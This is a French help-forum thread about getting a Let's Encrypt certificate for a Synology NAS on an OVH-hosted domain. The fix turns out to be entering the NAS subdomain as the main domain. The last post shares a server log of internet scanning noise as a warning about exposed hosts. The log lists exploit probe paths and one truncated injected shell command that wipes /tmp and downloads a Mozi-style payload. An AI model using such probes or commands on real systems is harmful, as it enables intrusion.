Certificat Let's Encrypt domaine OVH pour mon Synology

ThomasM_1 · Mars 9, 2021, 8:01

Bonsoir,
J'essaye de générer sur mon Synology un certificat SSL Let's Encrypt pour monnas.domaine.com, mais cela plante tous le temps. J'ai déjà pas mal cherché du côté du Synology et je me demande maintenant si le "problème" ne vient pas de mon setup chez OVH.
Mon domain est hébergé chez OVH et j'ai juste une landing page affichée sur le root de mon domaine. Ce site est bien protégé par un certificat Let's Encrypt.
Via le Syno, comme j'essaye de générer un certificate pour monnas.domaine.com, cela plante à chaque fois, et je me demande si ce n'est pas parcequ'il y a déjà un cert valide chez OVH.
Est-ce que quelqu'un aurait de l'expérience avec ce genre de setup?
Est-ce possible d'avoir un cert sur le NAS alors qu'il y en a déjà un valide chez OVH pour le site web ? Ou bien cela demanderait un nouveau domaine (ou bien de rediriger mon nom de domaine vers l'IP de mon NAS?
Merci

fritz2cat · Mars 9, 2021, 8:06

monnas.domaine.com

Si cette adresse monnas.domaine.com est bien celle de votre maison et non une landing page d'OVH, c'est bien le Synology qui doit faire la procédure d'acquisition du certificat.

Pour que ça fonctionne prévoyez de rediriger les ports 80 et 443 de votre box vers l'adresse IP interne de votre NAS.

ThomasM_1 · Mars 9, 2021, 9:07

Bonsoir @Fritz2cat, oui monnas.domaine.com est bien résolu sur l'IP de ma maison. D'ailleurs j'utilise cette adresse pour le serveur OpenVPN qui tourne sur le Synology et j'y arrive à m'y connecter sans soucis avec mon téléphone sur la 4G par exemple.
Je viens de retester le génération du certificat Let's Encrypt, mais cela plante à chaque fois.
Pourtant j'ai bien vérifié avec https://www.yougetsignal.com/tools/open-ports/, les ports 80 et 443 sont bien ouverts et transférés vers l'IP du NAS dans la table NAT.
Voilà ce que j'obtiens sur le Synology : "Failed to connect to Let’s Encrypt. Please make sure the domain is correct"

janus57_1 · Mars 9, 2021, 9:12

Bonjour,

sans le vrai domaine impossible d'aller plus loin.

Cordialement, janus57

ThomasM_1 · Mars 9, 2021, 9:25

bonsoir @janus57 le domaine est mallie.be et le A record qui pointe vers mon NAS est synology.mallie.be

ThomasM_1 · Mars 9, 2021, 9:50

Bonsoir, le nom de domaine est mallie.be

fritz2cat · Mars 9, 2021, 10:09

Bonsoir, le nom de domaine est mallie.be

Bonjour,

Cette adresse pointe sur cluster011 chez OVH et non pas sur un NAS.

et

monnas.mallie.be : status: NXDOMAIN (inconnu)

donc pas de tests possibles, désolé.

ThomasM_1 · Mars 9, 2021, 10:30

bonsoir fritz, merci d'avoir vérifié c'est gentil de prendre le temps.
oui l'adresse mallie.be pointe vers le cluster OVH car c'est là que j'ai une page web.
J'ai un A record dans mon DNS du genre monnas.mallie.be. C'est un A record qui est mis à jour automatiquement par le NAS via DDNS.
Il ne s'agit pas vraiment de monnas.mallie.be, mais d'une autre adresse.
Pour le moment si je donne cette adresse on arrive sur mon NAS qui n'est pas sécurisé, donc c'est pour cela que je ne me sens pas à l'aise de publier cela sur un forum publique sur le Net.
Avec le port 80 forwardé vers le NAS, on tombe sur la page que je montre ici : https://community.synology.com/enu/forum/1/post/141801

ThomasM_1 · Mars 9, 2021, 11:01

Bon à force de chipoter, j'ai finalement résolu le problème.
J'ai fait deux chose l'une à la suite de l'autre, donc je ne suis pas certain de laquelle a résolu le problème.

1/ Dans ma zone DNS dans le manager OVH j'avais un A record monnas.domaine.com que je pense j'avais créé à la main. J'ai lu sur plusieurs forums (ex: https://www.1forum.com/forum/topic/59019-r%C3%A9solucertificat-lets-encrypt-et-ovh/forum.com/forum/topic/59019-r%C3%A9solucertificat-lets-encrypt-et-ovh/) , que apparemment la présence d'un A record de ce genre peut poser problème au processus de registration Let's Encrypt du Syno. Je l'ai donc supprimé. J'avais de toute manière toujours l'entrée DynHost pointant vers mon NAS qui se mettait bien à jour.

2/ Dans l'interface du Syno je remplissais les champs comme ceci :
-Domaine : domaine.com
-Email : mon email
-Subject Alternative Name : monnas.domain.com

La dernière fois, j'ai utilisé :
-Domaine : monnas.domaine.com
-Email : mon email
-Subject Alternative Name :

Et là la requête est passée et le certificat a été généré sans soucis.

janus57_1 · Mars 10, 2021, 4:27

Bonjour,

ce qui a "résolu" votre problème c'est le N°2 car là vous avez indiqué le vrai domaine.

P.S. ne pas vouloir poster une adresse car votre NAS n'est pas sécurisé est le dernier de vos soucis, sachez que le web est remplis de robots qui scan les IPs, donc il y a de forte chance que votre NAS soit découvert depuis le jour ou vous l'avez rendu accessible sur internet et que depuis des robots essaye d'y accéder.

Cordialement, janus57

fritz2cat · Mars 10, 2021, 8:11

Avec le port 80 forwardé vers le NAS, on tombe sur la page que je montre ici : https://community.synology.com/enu/forum/1/post/141801

Bonjour,

Dans la copie d'écran c'est squid qui répond. J'avais donc 100% raison en suspectant le reverse proxy.

Et là la requête est passée et le certificat a été généré sans soucis.

Bien vu.

fritz2cat · Mars 10, 2021, 8:15

on arrive sur mon NAS qui n'est pas sécurisé

Petite info: voici le log d'un serveur http+https qui tourne sur le port 80 et 443, sur lequel aucun site n'est public:

Appréciez le "bruit de fond" d'internet

Connection attempts using mod_proxy:
124.225.43.230 -> www.baidu.com:443: 1 Time(s)
223.166.75.254 -> www.voanews.com:443: 1 Time(s)
27.224.136.11 -> cn.bing.com:443: 1 Time(s)
37.120.142.71 -> ver.movistarplus.es:443: 1 Time(s)
49.113.96.13 -> www.so.com:443: 1 Time(s)

A total of 5 sites probed the server
138.68.128.38
139.162.145.250
167.71.239.158
193.29.13.47
203.159.80.134

Requests with error response codes
400 Bad Request
null: 6 Time(s)
/: 1 Time(s)
/HNAP1/: 1 Time(s)
404 Not Found
/robots.txt: 17 Time(s)
/.env: 15 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 12 Time(s)
/_ignition/execute-solution: 8 Time(s)
/Autodiscover/Autodiscover.xml: 6 Time(s)
/api/jsonws/invoke: 6 Time(s)
/console/: 6 Time(s)
/index.php?s=/Index/\\think\\app/invokefun ... HelloThinkPHP21: 6 Time(s)
/wp-content/plugins/wp-file-manager/readme.txt: 6 Time(s)
/jenkins/login: 4 Time(s)
/login: 4 Time(s)
/manager/html: 4 Time(s)
/wp-login.php: 4 Time(s)
/actuator/health: 3 Time(s)
/config/getuser?index=0: 3 Time(s)
/mifs/.;/services/LogService: 3 Time(s)
//a2billing/customer/templates/default/footer.tpl: 2 Time(s)
/ReportServer: 2 Time(s)
/admin/assets/js/views/login.js: 2 Time(s)
/admin/config.php: 2 Time(s)
/hudson: 2 Time(s)
/portal/redlion: 2 Time(s)
/solr/admin/info/system?wt=json: 2 Time(s)
/0bef: 1 Time(s)
/8Nbu: 1 Time(s)
/CFIDE/administrator/: 1 Time(s)
/GponForm/diag_Form?images/: 1 Time(s)
/apple-touch-icon.png: 1 Time(s)
/boaform/admin/formLogin?username=adminisp&psd=adminisp: 1 Time(s)
/phpmyadmin/: 1 Time(s)
/public/.env: 1 Time(s)
/shell?cd+/tmp;rm+-rf+*;wget+http://178.17 ... tmp/Mozi.a+jaws: 1 Time(s)
/storage/.env: 1 Time(s)
/vendor/.env: 1 Time(s)
http://www.rfa.org/english/: 1 Time(s)
405 Method Not Allowed
cn.bing.com:443: 1 Time(s)
ver.movistarplus.es:443: 1 Time(s)
www.baidu.com:443: 1 Time(s)
www.so.com:443: 1 Time(s)
www.voanews.com:443: 1 Time(s)

C'est un jour calme et ordinaire.